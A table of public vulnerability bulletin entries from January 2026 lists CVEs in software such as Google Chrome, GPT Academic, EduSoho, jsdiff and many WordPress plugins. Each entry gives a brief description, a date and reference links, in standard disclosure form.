| Google--Chrome | Incorrect security UI in Google Chrome on Android prior to 144.0.7559.59 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Low) | 2026-01-20 | not yet calculated | CVE-2026-0906 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/467448811 |
| Google--Chrome | Incorrect security UI in Split View in Google Chrome prior to 144.0.7559.59 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low) | 2026-01-20 | not yet calculated | CVE-2026-0907 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/444653104 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 144.0.7559.59 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Low) | 2026-01-20 | not yet calculated | CVE-2026-0908 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/452209503 |
| Google--Sentencepiece | Invalid memory access in Sentencepiece versions less than 0.2.1 when using a vulnerable model file, which is not created in the normal training procedure. | 2026-01-22 | not yet calculated | CVE-2026-1260 | https://github.com/google/sentencepiece/releases/tag/v0.2.1 |
| GPT Academic--GPT Academic | GPT Academic stream_daas Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GPT Academic. Interaction with a malicious DAAS server is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the stream_daas function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27956. | 2026-01-23 | not yet calculated | CVE-2026-0762 | ZDI-26-028 |
| GPT Academic--GPT Academic | GPT Academic run_in_subprocess_wrapper_func Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GPT Academic. Authentication is not required to exploit this vulnerability. The specific flaw exists within the run_in_subprocess_wrapper_func function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27958. | 2026-01-23 | not yet calculated | CVE-2026-0763 | ZDI-26-029 |
| GPT Academic--GPT Academic | GPT Academic upload Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GPT Academic. Authentication is not required to exploit this vulnerability. The specific flaw exists within the upload endpoint. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27957. | 2026-01-23 | not yet calculated | CVE-2026-0764 | ZDI-26-030 |
| gregmolnar--Simple XML Sitemap | Cross-Site Request Forgery (CSRF) vulnerability in gregmolnar Simple XML Sitemap simple-xml-sitemap allows Stored XSS. This issue affects Simple XML Sitemap: from n/a through <= 1.3. | 2026-01-22 | not yet calculated | CVE-2026-22355 | https://patchstack.com/database/Wordpress/Plugin/simple-xml-sitemap/vulnerability/wordpress-simple-xml-sitemap-plugin-1-3-csrf-to-stored-xss-vulnerability?_s_id=cve |
| Hangzhou Kuozhi Network Technology Co., Ltd.--EduSoho | EduSoho versions prior to 22.4.7 contain an arbitrary file read vulnerability in the classroom-course-statistics export functionality. A remote, unauthenticated attacker can supply crafted path traversal sequences in the fileNames[] parameter to read arbitrary files from the server filesystem, including application configuration files such as config/parameters.yml that may contain secrets and database credentials. Exploitation evidence was observed by the Shadowserver Foundation on 2026-01-19 (UTC). | 2026-01-22 | not yet calculated | CVE-2023-7335 | https://www.edusoho.com/ https://github.com/edusoho/edusoho/releases/tag/v22.4.7 https://cn-sec.com/archives/2451582.html https://blog.csdn.net/qq_41904294/article/details/135007351 https://github.com/zeroChen00/exp-poc/blob/main/EduSoho%E6%95%99%E5%9F%B9%E7%B3%BB%E7%BB%9Fclassropm-course-statistics%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md https://github.com/gobysec/GobyVuls/blob/master/CNVD-2023-03903.md https://www.cnvd.org.cn/flaw/show/CNVD-2023-03903 https://www.vulncheck.com/advisories/edusoho-arbitrary-file-read-via-classroom-course-statistics |
| HappyMonster--Happy Addons for Elementor | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in HappyMonster Happy Addons for Elementor happy-elementor-addons allows Blind SQL Injection. This issue affects Happy Addons for Elementor: from n/a through <= 3.20.4. | 2026-01-22 | not yet calculated | CVE-2025-68999 | https://patchstack.com/database/Wordpress/Plugin/happy-elementor-addons/vulnerability/wordpress-happy-addons-for-elementor-plugin-3-20-4-sql-injection-vulnerability?_s_id=cve |
| Harmonic Design--HD Quiz | Missing Authorization vulnerability in Harmonic Design HD Quiz hd-quiz allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects HD Quiz: from n/a through <= 2.0.9. | 2026-01-23 | not yet calculated | CVE-2026-24544 | https://patchstack.com/database/Wordpress/Plugin/hd-quiz/vulnerability/wordpress-hd-quiz-plugin-2-0-9-broken-access-control-vulnerability?_s_id=cve |
| Harmonic Design--HDForms | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Harmonic Design HDForms hdforms allows Path Traversal. This issue affects HDForms: from n/a through <= 1.6.1. | 2026-01-22 | not yet calculated | CVE-2025-68912 | https://patchstack.com/database/Wordpress/Plugin/hdforms/vulnerability/wordpress-hdforms-plugin-1-6-1-arbitrary-file-deletion-vulnerability?_s_id=cve |
| hassantafreshi--Easy Form Builder | Missing Authorization vulnerability in hassantafreshi Easy Form Builder easy-form-builder allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Easy Form Builder: from n/a through <= 3.9.6. | 2026-01-22 | not yet calculated | CVE-2026-22472 | https://patchstack.com/database/Wordpress/Plugin/easy-form-builder/vulnerability/wordpress-easy-form-builder-plugin-3-9-4-broken-access-control-vulnerability?_s_id=cve |
| hexpm--hexpm | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in hexpm hexpm/hexpm ('Elixir.HexpmWeb.SharedAuthorizationView' modules) allows Cross-Site Scripting (XSS). This vulnerability is associated with program files lib/hexpm_web/views/shared_authorization_view.ex and program routines 'Elixir.HexpmWeb.SharedAuthorizationView':render_grouped_scopes/3. This issue affects hexpm: from 617e44c71f1dd9043870205f371d375c5c4d886d before c692438684ead90c3bcbfb9ccf4e63c768c668a8, from pkg:github/hexpm/hexpm@617e44c71f1dd9043870205f371d375c5c4d886d before pkg:github/hexpm/hexpm@c692438684ead90c3bcbfb9ccf4e63c768c668a8; hex.pm: from 2025-10-01 before 2026-01-19. | 2026-01-19 | not yet calculated | CVE-2026-21618 | https://github.com/hexpm/hexpm/security/advisories/GHSA-6cw9-5gg4-rhpj https://github.com/hexpm/hexpm/commit/c692438684ead90c3bcbfb9ccf4e63c768c668a8 |
| highwarden--Super Interactive Maps | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in highwarden Super Interactive Maps super-interactive-maps allows Reflected XSS. This issue affects Super Interactive Maps: from n/a through <= 2.3. | 2026-01-22 | not yet calculated | CVE-2025-49045 | https://patchstack.com/database/Wordpress/Plugin/super-interactive-maps/vulnerability/wordpress-super-interactive-maps-plugin-2-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| highwarden--Super Logos Showcase | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in highwarden Super Logos Showcase superlogoshowcase-wp allows Reflected XSS. This issue affects Super Logos Showcase: from n/a through <= 2.8. | 2026-01-22 | not yet calculated | CVE-2025-69054 | https://patchstack.com/database/Wordpress/Plugin/superlogoshowcase-wp/vulnerability/wordpress-super-logos-showcase-plugin-2-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Horea Radu--Materialis Companion | Missing Authorization vulnerability in Horea Radu Materialis Companion materialis-companion allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Materialis Companion: from n/a through <= 1.3.52. | 2026-01-23 | not yet calculated | CVE-2026-24543 | https://patchstack.com/database/Wordpress/Plugin/materialis-companion/vulnerability/wordpress-materialis-companion-plugin-1-3-52-broken-access-control-vulnerability?_s_id=cve |
| horilla-opensource--horilla | Horilla is a free and open source Human Resource Management System (HRMS). A critical File Upload vulnerability in versions prior to 1.5.0, with Social Engineering, allows authenticated users to deploy phishing attacks. By uploading a malicious HTML file disguised as a profile picture, an attacker can create a convincing login page replica that steals user credentials. When a victim visits the uploaded file URL, they see an authentic-looking "Session Expired" message prompting them to re-authenticate. All entered credentials are captured and sent to the attacker's server, enabling Account Takeover. Version 1.5.0 patches the issue. | 2026-01-22 | not yet calculated | CVE-2026-24010 | https://github.com/horilla-opensource/horilla/security/advisories/GHSA-5jfv-gw8w-49h3 https://github.com/horilla-opensource/horilla/releases/tag/1.5.0 |
| Hossni Mubarak--JobWP | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Hossni Mubarak JobWP jobwp allows Stored XSS. This issue affects JobWP: from n/a through <= 2.4.5. | 2026-01-22 | not yet calculated | CVE-2025-69318 | https://patchstack.com/database/Wordpress/Plugin/jobwp/vulnerability/wordpress-jobwp-plugin-2-4-5-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Hotwired Turbo--Hotwire Turbo | Race condition in the turbo-frame element handler in Hotwired Turbo before 8.0.x causes logout operations to fail when delayed frame responses reapply session cookies after logout. This can be exploited by remote attackers via selective network delays (e.g. delaying requests based on sequence or timing) or by physically proximate attackers when the race condition occurs naturally on shared computers. | 2026-01-20 | not yet calculated | CVE-2025-66803 | https://github.com/hotwired/turbo/pull/1399 https://turbo.hotwired.dev/handbook/frames https://github.com/hotwired/turbo/security/advisories/GHSA-qppm-g56g-fpvp |
| Hubitat--Elevation C3 | An Authorization Bypass Through User-Controlled Key vulnerability in Hubitat Elevation home automation controllers prior to version 2.4.2.157 could allow a remote authenticated user to control connected devices outside of their authorized scope via client-side request manipulation. | 2026-01-22 | not yet calculated | CVE-2026-1201 | https://www.cisa.gov/news-events/ics-advisories/icsa-26-022-06 |
| Hyyan Abo Fakher--Hyyan WooCommerce Polylang Integration | Missing Authorization vulnerability in Hyyan Abo Fakher Hyyan WooCommerce Polylang Integration woo-poly-integration allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Hyyan WooCommerce Polylang Integration: from n/a through <= 1.5.0. | 2026-01-23 | not yet calculated | CVE-2026-24585 | https://patchstack.com/database/Wordpress/Plugin/woo-poly-integration/vulnerability/wordpress-hyyan-woocommerce-polylang-integration-plugin-1-5-0-broken-access-control-vulnerability?_s_id=cve |
| Icegram--Icegram | Missing Authorization vulnerability in Icegram Icegram icegram allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Icegram: from n/a through <= 3.1.35. | 2026-01-22 | not yet calculated | CVE-2025-68507 | https://patchstack.com/database/Wordpress/Plugin/icegram/vulnerability/wordpress-icegram-plugin-3-1-35-broken-access-control-vulnerability?_s_id=cve |
| ichurakov--Paid Downloads | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in ichurakov Paid Downloads paid-downloads allows Blind SQL Injection. This issue affects Paid Downloads: from n/a through <= 3.15. | 2026-01-22 | not yet calculated | CVE-2025-68857 | https://patchstack.com/database/Wordpress/Plugin/paid-downloads/vulnerability/wordpress-paid-downloads-plugin-3-15-sql-injection-vulnerability?_s_id=cve |
| ilmosys--Order Listener for WooCommerce | Missing Authorization vulnerability in ilmosys Order Listener for WooCommerce woc-order-alert allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Order Listener for WooCommerce: from n/a through <= 3.6.1. | 2026-01-22 | not yet calculated | CVE-2025-68018 | https://patchstack.com/database/Wordpress/Plugin/woc-order-alert/vulnerability/wordpress-order-listener-for-woocommerce-plugin-3-6-0-broken-access-control-vulnerability?_s_id=cve |
| Imaginate Solutions--File Uploads Addon for WooCommerce | Missing Authorization vulnerability in Imaginate Solutions File Uploads Addon for WooCommerce woo-addon-uploads allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects File Uploads Addon for WooCommerce: from n/a through <= 1.7.3. | 2026-01-23 | not yet calculated | CVE-2026-24625 | https://patchstack.com/database/Wordpress/Plugin/woo-addon-uploads/vulnerability/wordpress-file-uploads-addon-for-woocommerce-plugin-1-7-3-broken-access-control-vulnerability?_s_id=cve |
| Imagination Technologies--Graphics DDK | A web page that contains unusual GPU shader code is loaded from the Internet into the GPU compiler process triggers a write use-after-free crash in the GPU shader compiler library. On certain platforms, when the compiler process has system privileges this could enable further exploits on the device. The shader code contained in the web page executes a path in the compiler that held onto an out of date pointer, pointing to a freed memory object. | 2026-01-24 | not yet calculated | CVE-2025-13952 | https://www.imaginationtech.com/gpu-driver-vulnerabilities/ |
| Imran Emu--Owl Carousel WP | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Imran Emu Owl Carousel WP owl-carousel-wp allows Stored XSS. This issue affects Owl Carousel WP: from n/a through <= 2.2.2. | 2026-01-22 | not yet calculated | CVE-2026-22388 | https://patchstack.com/database/Wordpress/Plugin/owl-carousel-wp/vulnerability/wordpress-owl-carousel-wp-plugin-2-2-2-cross-site-scripting-xss-vulnerability?_s_id=cve |
| iNET--iNET Webkit | Missing Authorization vulnerability in iNET iNET Webkit inet-webkit allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects iNET Webkit: from n/a through <= 1.2.4. | 2026-01-23 | not yet calculated | CVE-2026-24566 | https://patchstack.com/database/Wordpress/Plugin/inet-webkit/vulnerability/wordpress-inet-webkit-plugin-1-2-4-broken-access-control-vulnerability?_s_id=cve |
| Infility--Infility Global | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Infility Infility Global infility-global allows Stored XSS. This issue affects Infility Global: from n/a through <= 2.14.50. | 2026-01-22 | not yet calculated | CVE-2025-68864 | https://patchstack.com/database/Wordpress/Plugin/infility-global/vulnerability/wordpress-infility-global-plugin-2-14-49-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Inkscape--Inkscape | MacOS version of Inkscape bundles a Python interpreter that inherits the Transparency, Consent, and Control (TCC) permissions granted by the user to the main application bundle. An attacker with local user access can invoke this interpreter with arbitrary commands or scripts, leveraging the application's previously granted TCC permissions to access user's files in privacy-protected folders without triggering user prompts. Accessing other resources beyond previously granted TCC permissions will prompt the user for approval in the name of Inkscape, potentially disguising attacker's malicious intent. This issue has been fixed in 1.4.3 version of Inkscape. | 2026-01-22 | not yet calculated | CVE-2025-15523 | https://inkscape.org/ https://cert.pl/en/posts/2026/01/CVE-2025-15523/ |
| InspiryThemes--Real Homes CRM | Unrestricted Upload of File with Dangerous Type vulnerability in InspiryThemes Real Homes CRM realhomes-crm allows Using Malicious Files. This issue affects Real Homes CRM: from n/a through <= 1.0.0. | 2026-01-22 | not yet calculated | CVE-2025-67968 | https://patchstack.com/database/Wordpress/Plugin/realhomes-crm/vulnerability/wordpress-real-homes-crm-plugin-1-0-0-arbitrary-file-upload-vulnerability?_s_id=cve |
| Intermesh--groupoffice | Group-Office is an enterprise customer relationship management and groupware tool. In versions 6.8.148 and below, and 25.0.1 through 25.0.79, the application stores unsanitized filenames in the database, which can lead to Stored Cross-Site Scripting (XSS). Users who interact with these specially crafted file names within the Group-Office application are affected. While the scope is limited to the file-viewing context, it could still be used to interfere with user sessions or perform unintended actions in the browser. This issue is fixed in versions 6.8.149 and 25.0.80. | 2026-01-21 | not yet calculated | CVE-2026-23887 | https://github.com/Intermesh/groupoffice/security/advisories/GHSA-3gj5-gvvr-g6hp https://github.com/Intermesh/groupoffice/commit/3fa40d7edd31fbe33babe07061d5a14ad19ea40f https://github.com/Intermesh/groupoffice/commit/ac91b128157bc9c5ea015b6141ce71cd3bbc43f0 |
| Israpil--Textmetrics | Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Israpil Textmetrics webtexttool allows Code Injection. This issue affects Textmetrics: from n/a through <= 3.6.3. | 2026-01-23 | not yet calculated | CVE-2026-24564 | https://patchstack.com/database/Wordpress/Plugin/webtexttool/vulnerability/wordpress-textmetrics-plugin-3-6-3-arbitrary-shortcode-execution-vulnerability?_s_id=cve |
| jagdish1o1--Delay Redirects | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jagdish1o1 Delay Redirects delay-redirects allows DOM-Based XSS. This issue affects Delay Redirects: from n/a through <= 1.0.0. | 2026-01-23 | not yet calculated | CVE-2026-24632 | https://patchstack.com/database/Wordpress/Plugin/delay-redirects/vulnerability/wordpress-delay-redirects-plugin-1-0-0-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Jahid Hasan--Admin login URL Change | Missing Authorization vulnerability in Jahid Hasan Admin login URL Change admin-login-url-change allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Admin login URL Change: from n/a through <= 1.1.5. | 2026-01-23 | not yet calculated | CVE-2026-24578 | https://patchstack.com/database/Wordpress/Plugin/admin-login-url-change/vulnerability/wordpress-admin-login-url-change-plugin-1-1-5-broken-access-control-vulnerability?_s_id=cve |
| Jamf--Jamf Pro | Authentication Bypass by Primary Weakness vulnerability in Jamf Jamf Pro allows unspecified impact. This issue affects Jamf Pro: from 11.20 through 11.24. | 2026-01-21 | not yet calculated | CVE-2026-1290 | https://learn.jamf.com/en-US/bundle/jamf-pro-release-notes-11.24.0/page/Resolved_Issues.html |
| jegtheme--JNews - Frontend Submit | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jegtheme JNews - Frontend Submit jnews-frontend-submit allows Reflected XSS. This issue affects JNews - Frontend Submit: from n/a through <= 11.0.0. | 2026-01-22 | not yet calculated | CVE-2025-68904 | https://patchstack.com/database/Wordpress/Plugin/jnews-frontend-submit/vulnerability/wordpress-jnews-frontend-submit-plugin-11-0-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| jegtheme--JNews - Pay Writer | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in jegtheme JNews - Pay Writer jnews-pay-writer allows PHP Local File Inclusion. This issue affects JNews - Pay Writer: from n/a through <= 11.0.0. | 2026-01-22 | not yet calculated | CVE-2025-68905 | https://patchstack.com/database/Wordpress/Plugin/jnews-pay-writer/vulnerability/wordpress-jnews-pay-writer-plugin-11-0-0-local-file-inclusion-vulnerability?_s_id=cve |
| jegtheme--JNews - Video | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in jegtheme JNews - Video jnews-video allows Reflected XSS. This issue affects JNews - Video: from n/a through <= 11.0.2. | 2026-01-22 | not yet calculated | CVE-2025-68906 | https://patchstack.com/database/Wordpress/Plugin/jnews-video/vulnerability/wordpress-jnews-video-plugin-11-0-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Johan Jonk Stenstrm--Cookies and Content Security Policy | Insertion of Sensitive Information Into Sent Data vulnerability in Johan Jonk Stenström Cookies and Content Security Policy cookies-and-content-security-policy allows Retrieve Embedded Sensitive Data. This issue affects Cookies and Content Security Policy: from n/a through <= 2.34. | 2026-01-22 | not yet calculated | CVE-2025-63019 | https://patchstack.com/database/Wordpress/Plugin/cookies-and-content-security-policy/vulnerability/wordpress-cookies-and-content-security-policy-plugin-2-34-sensitive-data-exposure-vulnerability?_s_id=cve |
| John James Jacoby--WP Term Order | Cross-Site Request Forgery (CSRF) vulnerability in John James Jacoby WP Term Order wp-term-order allows Cross Site Request Forgery. This issue affects WP Term Order: from n/a through <= 2.1.0. | 2026-01-23 | not yet calculated | CVE-2026-24542 | https://patchstack.com/database/Wordpress/Plugin/wp-term-order/vulnerability/wordpress-wp-term-order-plugin-2-1-0-cross-site-request-forgery-csrf-vulnerability?_s_id=cve |
| Jthemes--xSmart | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Jthemes xSmart xsmart allows Reflected XSS. This issue affects xSmart: from n/a through <= 1.2.9.4. | 2026-01-22 | not yet calculated | CVE-2025-50006 | https://patchstack.com/database/Wordpress/Theme/xsmart/vulnerability/wordpress-xsmart-theme-1-2-9-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Jthemes--xSmart | Incorrect Privilege Assignment vulnerability in Jthemes xSmart xsmart allows Privilege Escalation. This issue affects xSmart: from n/a through <= 1.2.9.4. | 2026-01-22 | not yet calculated | CVE-2025-50007 | https://patchstack.com/database/Wordpress/Theme/xsmart/vulnerability/wordpress-xsmart-theme-1-2-9-4-privilege-escalation-vulnerability?_s_id=cve |
| Jthemes--xSmart | Missing Authorization vulnerability in Jthemes xSmart xsmart allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects xSmart: from n/a through <= 1.2.9.4. | 2026-01-22 | not yet calculated | CVE-2025-54002 | https://patchstack.com/database/Wordpress/Theme/xsmart/vulnerability/wordpress-xsmart-theme-1-2-9-4-broken-access-control-vulnerability?_s_id=cve |
| JV--HarfBuzz::Shaper | HarfBuzz::Shaper versions before 0.032 for Perl contains a bundled library with a null pointer dereference vulnerability. Versions before 0.032 contain HarfBuzz 8.4.0 or earlier bundled as hb_src.tar.gz in the source tarball, which is affected by CVE-2026-22693. | 2026-01-19 | not yet calculated | CVE-2026-0943 | https://bugzilla.redhat.com/show_bug.cgi?id=2429296 https://www.cve.org/CVERecord?id=CVE-2026-22693 https://metacpan.org/release/JV/HarfBuzz-Shaper-0.032/changes |
| Kaira--Blockons | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kaira Blockons blockons allows Stored XSS. This issue affects Blockons: from n/a through <= 1.2.15. | 2026-01-23 | not yet calculated | CVE-2026-24550 | https://patchstack.com/database/Wordpress/Plugin/blockons/vulnerability/wordpress-blockons-plugin-1-2-15-cross-site-scripting-xss-vulnerability?_s_id=cve |
| kamleshyadav--WP Lead Capturing Pages | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in kamleshyadav WP Lead Capturing Pages wp-lead-capture allows Blind SQL Injection. This issue affects WP Lead Capturing Pages: from n/a through <= 2.5. | 2026-01-22 | not yet calculated | CVE-2025-49050 | https://patchstack.com/database/Wordpress/Plugin/wp-lead-capture/vulnerability/wordpress-wp-lead-capturing-pages-plugin-2-5-sql-injection-vulnerability-2?_s_id=cve |
| kamleshyadav--WP Lead Capturing Pages | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in kamleshyadav WP Lead Capturing Pages wp-lead-capture allows Blind SQL Injection. This issue affects WP Lead Capturing Pages: from n/a through <= 2.5. | 2026-01-22 | not yet calculated | CVE-2025-49055 | https://patchstack.com/database/Wordpress/Plugin/wp-lead-capture/vulnerability/wordpress-wp-lead-capturing-pages-plugin-2-5-sql-injection-vulnerability?_s_id=cve |
| Kapil Chugh--My Post Order | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kapil Chugh My Post Order my-posts-order allows Reflected XSS. This issue affects My Post Order: from n/a through <= 1.2.1.1. | 2026-01-22 | not yet calculated | CVE-2025-68004 | https://patchstack.com/database/Wordpress/Plugin/my-posts-order/vulnerability/wordpress-my-post-order-plugin-1-2-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Kapil Paul--Payment Gateway bKash for WC | Missing Authorization vulnerability in Kapil Paul Payment Gateway bKash for WC woo-payment-bkash allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Payment Gateway bKash for WC: from n/a through <= 3.1.0. | 2026-01-22 | not yet calculated | CVE-2025-62754 | https://patchstack.com/database/Wordpress/Plugin/woo-payment-bkash/vulnerability/wordpress-payment-gateway-bkash-for-wc-plugin-3-0-0-broken-access-control-vulnerability?_s_id=cve |
| Katana Network--Development Starter Kit | Katana Network Development Starter Kit executeCommand Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Katana Network Development Starter Kit. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the executeCommand method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27786. | 2026-01-23 | not yet calculated | CVE-2026-0759 | ZDI-26-025 |
| kpdecker--jsdiff | jsdiff is a JavaScript text differencing implementation. Prior to versions 8.0.3, 5.2.2, and 4.0.4, attempting to parse a patch whose filename headers contain the line break characters `\r`, `\u2028`, or `\u2029` can cause the `parsePatch` method to enter an infinite loop. It then consumes memory without limit until the process crashes due to running out of memory. Applications are therefore likely to be vulnerable to a denial-of-service attack if they call `parsePatch` with a user-provided patch as input. A large payload is not needed to trigger the vulnerability, so size limits on user input do not provide any protection. Furthermore, some applications may be vulnerable even when calling `parsePatch` on a patch generated by the application itself if the user is nonetheless able to control the filename headers (e.g. by directly providing the filenames of the files to be diffed). The `applyPatch` method is similarly affected if (and only if) called with a string representation of a patch as an argument, since under the hood it parses that string using `parsePatch`. Other methods of the library are unaffected. Finally, a second and lesser interdependent bug - a ReDOS - also exhibits when those same line break characters are present in a patch's *patch* header (also known as its "leading garbage"). A maliciously-crafted patch header of length *n* can take `parsePatch` O(*n*³) time to parse. Versions 8.0.3, 5.2.2, and 4.0.4 contain a fix. As a workaround, do not attempt to parse patches that contain any of these characters: `\r`, `\u2028`, or `\u2029`. | 2026-01-22 | not yet calculated | CVE-2026-24001 | https://github.com/kpdecker/jsdiff/security/advisories/GHSA-73rr-hh4g-fpgx https://github.com/kpdecker/jsdiff/issues/653 https://github.com/kpdecker/jsdiff/pull/649 https://github.com/kpdecker/jsdiff/commit/15a1585230748c8ae6f8274c202e0c87309142f5 |
| Kriesi--Enfold | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kriesi Enfold enfold allows DOM-Based XSS. This issue affects Enfold: from n/a through <= 7.1.3. | 2026-01-22 | not yet calculated | CVE-2025-68900 | https://patchstack.com/database/Wordpress/Theme/enfold/vulnerability/wordpress-enfold-theme-7-1-3-cross-site-scripting-xss-vulnerability?_s_id=cve |
| kutsy--AJAX Hits Counter + Popular Posts Widget | Missing Authorization vulnerability in kutsy AJAX Hits Counter + Popular Posts Widget ajax-hits-counter allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects AJAX Hits Counter + Popular Posts Widget: from n/a through <= 0.10.210305. | 2026-01-23 | not yet calculated | CVE-2026-24587 | https://patchstack.com/database/Wordpress/Plugin/ajax-hits-counter/vulnerability/wordpress-ajax-hits-counter-popular-posts-widget-plugin-0-10-210305-broken-access-control-vulnerability?_s_id=cve |
| LambertGroup--Accordion Slider PRO | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Accordion Slider PRO accordion_slider_pro allows Reflected XSS. This issue affects Accordion Slider PRO: from n/a through <= 1.2. | 2026-01-22 | not yet calculated | CVE-2025-49066 | https://patchstack.com/database/Wordpress/Plugin/accordion_slider_pro/vulnerability/wordpress-accordion-slider-pro-plugin-1-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LambertGroup--HTML5 Video Player | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup HTML5 Video Player lbg-vp2-html5-bottom allows Reflected XSS. This issue affects HTML5 Video Player: from n/a through <= 5.3.5. | 2026-01-22 | not yet calculated | CVE-2025-27005 | https://patchstack.com/database/Wordpress/Plugin/lbg-vp2-html5-bottom/vulnerability/wordpress-html5-video-player-plugin-5-3-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LambertGroup--HTML5 Video Player with Playlist & Multiple Skins | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup HTML5 Video Player with Playlist & Multiple Skins lbg-vp2-html5-rightside allows Reflected XSS. This issue affects HTML5 Video Player with Playlist & Multiple Skins: from n/a through <= 5.3.5. | 2026-01-22 | not yet calculated | CVE-2025-32123 | https://patchstack.com/database/Wordpress/Plugin/lbg-vp2-html5-rightside/vulnerability/wordpress-html5-video-player-with-playlist-multiple-skins-plugin-5-3-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LambertGroup--Image&Video FullScreen Background | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Image&Video FullScreen Background lbg_fullscreen_fullwidth_slider allows Reflected XSS. This issue affects Image&Video FullScreen Background: from n/a through <= 1.6.7. | 2026-01-22 | not yet calculated | CVE-2025-47666 | https://patchstack.com/database/Wordpress/Plugin/lbg_fullscreen_fullwidth_slider/vulnerability/wordpress-image-video-fullscreen-background-plugin-1-6-7-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LambertGroup--Magic Responsive Slider and Carousel WordPress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Magic Responsive Slider and Carousel WordPress magic_carousel allows Reflected XSS. This issue affects Magic Responsive Slider and Carousel WordPress: from n/a through <= 1.6. | 2026-01-22 | not yet calculated | CVE-2025-49043 | https://patchstack.com/database/Wordpress/Plugin/magic_carousel/vulnerability/wordpress-magic-responsive-slider-and-carousel-wordpress-plugin-1-6-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| LambertGroup--Magic Slider | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LambertGroup Magic Slider magic_slider allows Reflected XSS. This issue affects Magic Slider: from n/a through <= 2.2. | 2026-01-22 | not yet calculated | CVE-2025-48094 | https://patchstack.com/database/Wordpress/Plugin/magic_slider/vulnerability/wordpress-magic-slider-plugin-2-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
